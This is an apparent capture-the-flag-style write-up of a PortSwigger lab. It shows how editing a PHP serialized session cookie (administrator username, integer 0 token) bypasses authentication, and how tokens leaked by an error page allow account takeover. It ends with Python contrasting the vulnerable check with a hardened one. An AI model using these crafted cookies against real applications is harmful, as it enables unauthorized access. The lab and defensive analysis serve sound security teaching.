Lab: Modifying serialized data types | Portswigger

Web security academy

Lab description

This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.

Access the lab

  • Log in with the provided credentials (wiener : peter).
  • In Burp, open the post-login GET /my-account request and examine the session cookie using the Inspector to reveal a serialized PHP object. Send this request to Burp Repeater.
  • URL-decode the cookie, then base64-decode it to reveal the serialized object:
[Screenshot: deserialization format]
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh";}
  • In Burp Repeater, use the Inspector panel to modify the session cookie as follows:
      • Update the length of the username attribute to 13.
      • Change the username to administrator.
      • Change the access token to the integer 0. As this is no longer a string, you also need to remove the double-quotes surrounding the value.
      • Update the data type label for the access token by replacing s with i.
[Screenshot: modifying data types]
  • Base64-encode the modified object first:
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtpOjA7fQ==
  • Then URL-encode it:
%54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67%36%49%6e%56%7a%5a%58%4a%75%59%57%31%6c%49%6a%74%7a%4f%6a%59%36%49%6e%64%70%5a%57%35%6c%63%69%49%37%63%7a%6f%78%4d%6a%6f%69%59%57%4e%6a%5a%58%4e%7a%58%33%52%76%61%32%56%75%49%6a%74%70%4f%6a%41%37%66%51%3d%3d
  • Copy this URL-encoded value, paste it into the session cookie in the Inspector, and refresh the page.
  • Wow, I got access to the admin panel and have the permission to delete any user.
[Screenshot: access admin panel]

Second method

While solving the lab, I made an error in the session format; it caused an internal server error, and the server leaked all the tokens stored in the system.

[Screenshot: internal server error]
$access_tokens = [z95mls52t3l8efgp85tfl1aalg54hyg9, gjv08qeybgi7kisid7dsen67zsdj0vbc, f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh]
  • I tried this token: z95mls52t3l8efgp85tfl1aalg54hyg9
  • Then I changed the token value as in the following format:
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"z95mls52t3l8efgp85tfl1aalg54hyg9";}
  • I changed the token to the last one: gjv08qeybgi7kisid7dsen67zsdj0vbc
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"gjv08qeybgi7kisid7dsen67zsdj0vbc";}
[Screenshot: admin panel]
[Screenshot: solved]
  • So, I changed the length of the username from 13 to 6.
  • I changed the value of the username from administrator to carlos, as in the following format.
  • I changed the token to the last one.
O:4:"User":2:{s:8:"username";s:6:"carlos";s:12:"access_token";s:32:"z95mls52t3l8efgp85tfl1aalg54hyg9";}
[Screenshot: account takeover]
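As an added example (it is not part of this write-up and not PortSwigger's lab code), the following Python models both halves of what the two methods above exercise. It parses and rebuilds the PHP serialization layout used by the session cookie, computing every `s:<length>` prefix instead of editing it by hand and writing an integer token as `i:0;` with no length field at all, and it contrasts a PHP 7-style loose comparison of the deserialized `access_token` (the check that accepts the integer 0) with a strict, constant-time check that also returns a generic failure on malformed input rather than the verbose error that exposed the token list in the second method. The base64 value is the one shown in the write-up after the edit; the `VALID_TOKENS` table, the administrator placeholder token and all function names are assumptions made for this example.

```python
import base64
import hmac
import re
from urllib.parse import quote, unquote

# Assumed server-side token table: wiener's token is the one in the write-up,
# the administrator entry is a constructed placeholder, not a real lab value.
VALID_TOKENS = {
    "wiener": "f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh",
    "administrator": "placeholder-admin-token-not-real",
}
# The base64 value from the write-up, percent-encoded the way the cookie is sent.
WRITEUP_B64 = "Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtpOjA7fQ=="
WRITEUP_COOKIE = quote(WRITEUP_B64, safe="")


class PhpSerializeError(ValueError):
    """Any deviation from the expected serialized layout."""

def _expect(data, pos, literal):
    if not data.startswith(literal, pos):
        raise PhpSerializeError(f"expected {literal!r} at offset {pos}")
    return pos + len(literal)

def _read_until(data, pos, stop):
    end = data.find(stop, pos)
    if end == -1:
        raise PhpSerializeError(f"missing {stop!r} after offset {pos}")
    return data[pos:end], end + len(stop)

def _parse_value(data, pos):
    tag = data[pos:pos + 1]
    if tag == "s":  # s:<length>:"<chars>";  the declared length must match exactly
        length, pos = _read_until(data, _expect(data, pos, "s:"), ':"')
        length = int(length)
        value = data[pos:pos + length]
        if len(value) != length:
            raise PhpSerializeError("string shorter than its declared length")
        return value, _expect(data, pos + length, '";')
    if tag == "i":  # i:<integer>;  integers carry no length field
        number, pos = _read_until(data, _expect(data, pos, "i:"), ";")
        return int(number), pos
    if tag == "O":  # O:<len>:"<class>":<count>:{<key><value>...}
        name_len, pos = _read_until(data, _expect(data, pos, "O:"), ':"')
        name_len = int(name_len)
        class_name = data[pos:pos + name_len]
        pos = _expect(data, pos + name_len, '":')
        count, pos = _read_until(data, pos, ":{")
        obj = {"__class__": class_name}
        for _ in range(int(count)):
            key, pos = _parse_value(data, pos)
            obj[key], pos = _parse_value(data, pos)
        return obj, _expect(data, pos, "}")
    raise PhpSerializeError(f"unsupported type tag {tag!r} at offset {pos}")

def parse_php_serialized(data):
    value, pos = _parse_value(data, 0)
    if pos != len(data):
        raise PhpSerializeError("trailing data after the object")
    return value

def serialize_user(username, token):
    """Rebuild the lab's User object: lengths are computed (s:6 wiener, s:13 administrator),
    and an integer token is written as i:0; with no length."""
    def enc(v):
        return f's:{len(v)}:"{v}";' if isinstance(v, str) else f"i:{v};"
    return 'O:4:"User":2:{' + enc("username") + enc(username) + enc("access_token") + enc(token) + "}"

def encode_session_cookie(serialized):
    return quote(base64.b64encode(serialized.encode("ascii")).decode("ascii"), safe="")

def decode_session_cookie(cookie):
    return base64.b64decode(unquote(cookie), validate=True).decode("ascii")

_LEADING_NUMBER = re.compile(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")
def php7_loose_equals(left, right):
    """Simplified emulation of PHP 7's == for int vs string: the string becomes a number
    (its leading numeric prefix, else 0), so 0 == "f7cf..." is true. PHP 8 changed this rule."""
    if isinstance(left, int) and isinstance(right, str):
        left, right = right, left
    if isinstance(left, str) and isinstance(right, int):
        match = _LEADING_NUMBER.match(left)
        return (float(match.group()) if match else 0) == right
    return left == right

def check_session_loose(cookie):
    """Vulnerable pattern: trust the deserialized type and compare with ==."""
    user = parse_php_serialized(decode_session_cookie(cookie))
    expected = VALID_TOKENS.get(user.get("username"))
    ok = expected is not None and php7_loose_equals(user.get("access_token"), expected)
    return user["username"] if ok else None

def check_session_strict(cookie):
    """Hardened pattern: malformed input yields the same generic None as a bad token (no
    error page echoing server state), the token must be a string, compare constant-time."""
    try:
        user = parse_php_serialized(decode_session_cookie(cookie))
    except ValueError:  # covers PhpSerializeError, bad base64 and int() failures
        return None
    if not isinstance(user, dict) or user.get("__class__") != "User":
        return None
    token, expected = user.get("access_token"), VALID_TOKENS.get(user.get("username"))
    if not isinstance(token, str) or expected is None:
        return None
    return user["username"] if hmac.compare_digest(token, expected) else None
```

Running `check_session_loose(encode_session_cookie(serialize_user("administrator", 0)))` returns `"administrator"` while `check_session_strict` on the same cookie returns `None`, and a cookie whose username length does not match its value (the mistake that produced the error page in the second method) also comes back as a plain `None` from the strict check. The comparison fix is defense in depth only: the durable remedy for this class of bug is to never unserialize client-controlled data for session state and to use an opaque, server-side session identifier instead.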

Cyber security engineer
